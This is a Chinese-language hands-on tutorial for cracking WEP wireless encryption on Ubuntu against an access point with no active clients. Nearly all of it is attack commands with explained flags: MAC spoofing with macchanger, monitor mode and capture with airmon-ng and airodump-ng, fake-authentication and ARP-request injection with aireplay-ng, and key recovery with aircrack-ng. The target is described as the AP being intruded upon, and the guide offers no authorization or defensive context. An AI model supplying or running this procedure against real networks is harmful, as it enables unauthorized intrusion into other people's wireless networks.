Ubuntu下无客户端无线WEP加密破解实战讲解[多图]


为扩展大家思路及抛砖引玉,这里不再使用BackTrack2,而是使用另外一款也很受欢迎的操作系统Ubuntu作为破解平台.

在图形界面中,打开一个Shell,如下图,

Ubuntu下无客户端无线WEP加密破解实战讲解[多图]

输入ifconfig -a        察看当前网卡

这里我就使用USB网卡为例,可以看到有一个名为rausb0的网卡,状态是未载入,这里先不要载入,先将MAC地址修改成需伪造的任意MAC地址,

输入macchanger –m 00:11:22:33:44:55 rausb0

-m后跟要伪造的MAC,之后再跟要修改的网卡名即可,这里我们将该USB网卡MAC修改成00:11:22:33:44:55

然后再载入网卡,输入:

ifconfig -a rausb0 up来载入USB网卡驱动

下来,我们可以使用如Kismet、Airosnort等工具来扫描当前无线网络的AP,

然后,我们需要将网卡激活成monitor模式,才可以进行后续的破解,命令如下:

airmon-ng start rausb0 3,这里这个3就是我们发现的AP的频道,然后输入下列命令开始抓包

airodump-ng -w test.cap --channel 3 rausb0 ,这里test.cap就是我设置的抓包文件名

下来,就可以进行FakeAuth攻击,这种攻击就是专门在预攻击无线接入点AP没有客户端活动甚至不存在Client的情况下使用的。具体命令如下:

aireplay-ng -1 1 -e AP’s ESSID -a AP’s MAC -h FakeMAC rausb0

这里-1指的就是采用FakeAuth攻击模式,后面跟延迟;-e后面跟AP的ESSID,-a后面设置AP的MAC,-h后面则是前面伪造的MAC,最后是无线网卡。

与此同时,为了IVs(初始化向量)的获取,必须进行ArpRequest注入式攻击,这个很重要,可以有效提高抓包数量及破解速度,命令如下

aireplay-ng -3 -b   AP's MAC   -h Client's MAC   -x 1024 rausb0

解释一下:-3指的是采取ArpRequest注入攻击方式,-b后面跟上要入侵的AP的MAC地址,-h后面跟的是监测到的客户端MAC地址,这里我们使用刚才伪造的客户端MAC,如上图中显示的,至于-x 1024指的是定义每秒发送数据包数量,这个值可以小一些,但最高1024就可以了,这里我使用默认,最后是指定USB无线网卡接下来,就可以同步开启aircrack-ng来进行同步破解了,命令如下:

aircrack-ng -x -f 2   test-01.cap这里-x是暴力破解模式,-f指的是启用密码复杂度为2 ,后面是我们即时保存的那个抓包文件,

相关内容